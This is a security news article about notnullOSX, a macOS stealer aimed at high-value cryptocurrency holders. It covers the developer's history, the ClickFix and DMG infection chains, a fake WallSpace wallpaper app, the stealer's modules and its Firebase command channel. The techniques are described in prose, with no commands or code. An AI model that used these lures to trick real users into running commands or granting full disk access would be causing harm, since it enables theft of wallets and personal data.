Rise of notnullOSX: A New Threat to macOS Users
Recent reports have surfaced about a sophisticated malicious software, termed notnullOSX, which is specifically designed to target macOS users who possess substantial cryptocurrency holdings. This stealer is being disseminated through deceptive ClickFix commands and booby-trapped DMG installers, leading to significant security risks for Mac users.
The origins of this alarming development can be traced back to 0xFFF, a malware developer who made headlines when he suddenly exited a prominent Russian-speaking hacking forum in 2023. His departure was marked by claims of an investigation into his activities and accusations against the forum of collaborating with law enforcement agencies. It was at this juncture that he touted the creation of a new, ruthless tool designed to specifically plunder cryptocurrency wallets for users holding amounts exceeding USD 10,000.
By August 2024, 0xFFF resurfaced under the alias alh1mik, re-establishing his presence on Telegram with promises of a new macOS stealer. This gesture was part of an effort to regain his reputation within the cybercrime community. The culmination of this venture was notnullOSX, which became operational by early 2026. The malware is designed as a modular implant that is disseminated through custom lures, an affiliate panel, and a dedicated ecosystem for operators.
Initial Infection: The Deceptive Google Document
The notnullOSX infection process begins with an enticing bait: a fake “protected” Google document, as identified by the researcher @g0njxa on X. Victims encounter a misleading error message indicating that encryption has failed due to an outdated “Google API Connector.” This message presents two seemingly legitimate options to “fix” the issue, but both paths ultimately lead to malware installation.
Prior to unleashing a lure, operators take a meticulous approach by submitting detailed target profiles through an affiliate panel. This includes social media links, prior interactions, and the victim’s cryptocurrency wallet address, explicitly enforcing a threshold that excludes wallets holding less than $10,000. This strategy ensures that the campaign is directed towards high-value targets, enhancing the potential payoff.
Two Infection Routes
The campaign employs two parallel social-engineering chains, both converging on the same malicious implant:
-
ClickFix Chain: Victims are instructed to open Terminal and run a base64-encoded command that retrieves a bash installer from the attackers’ infrastructure. This script downloads a Mach-O payload, removes security flags, and embeds it within a minimal application. The user is then carefully guided to grant full disk access to this fake application, inadvertently providing the malware with extensive access to personal data.
- DMG Chain: In this route, victims encounter a malicious disk image displaying files like Install.sh and README.txt, instructing them to execute a terminal alias that leads to the same malware installation process as the ClickFix method.
Both methods rely not on external exploits, but rather on manipulation of user actions, circumventing traditional security measures.
WallSpace Disguise and Distribution Tactics
Further analysis by Moonlock Lab revealed that notnullOSX has been disguised under appealing names such as WallSpace.app, which mimics a legitimate macOS live wallpaper application. However, attempts to download from wallpapermacos[.]com result in immediate cloud security warnings, raising alarms about malware presence.
Visitors are lured by the polished website claiming to offer free wallpapers, yet investigation shows that the download path raises malware flags. Curiously, another domain, wallspaceapp[.]com, emerged at the top of Google search results for related queries, linked to a classic ClickFix page that further directs users to execute harmful terminal commands.
Moreover, the distribution of notnullOSX was funneled through a seemingly innocent YouTube channel. While originally created in 2015, it was recently redirected to host a singular WallSpace video that amassed tens of thousands of views, showcasing a pattern of hijacking and boosting channels for malicious ends.
The Modular Framework of notnullOSX
The main payload of notnullOSX is a robust, multi-architecture Mach-O binary that is not widely flagged by antivirus solutions, often misclassified as “adware” or “potentially unwanted.” Once installed and granted full disk access, the malware operates as a modular stealer, downloading various components from a legitimate CDN and executing them to harvest specific types of information.
Documented modules include those targeting system information, iMessages, Apple notes, browser cookies, and most alarmingly, cryptocurrency wallets. A particularly devious feature named ReplaceApp even allows the malware to swap legitimate crypto wallet applications with trojanized replicas, stealing seed phrases during setup.
In contrast to typical smash-and-grab methods, notnullOSX maintains a persistent, TLS-encrypted communication channel with its command-and-control server through Firebase Realtime Database. This setup allows for real-time commands and data exfiltration, significantly enhancing its stealth capabilities.
Conclusion
The first recorded instances of notnullOSX appearing in the wild date back to March 30, 2026, affecting users in regions such as Vietnam, Taiwan, and Spain. This ongoing threat poses a considerable challenge for cybersecurity professionals, drawing attention to the escalating sophistication of targeted malware campaigns.
The emergence of notnullOSX underscores several critical defensive measures: the normalization of socially engineered terminal commands as a malware distribution technique, the need to treat full disk access prompts as potential red flags, and the heightened risk faced by high-value crypto users targeted by such advanced, modular stealing operations.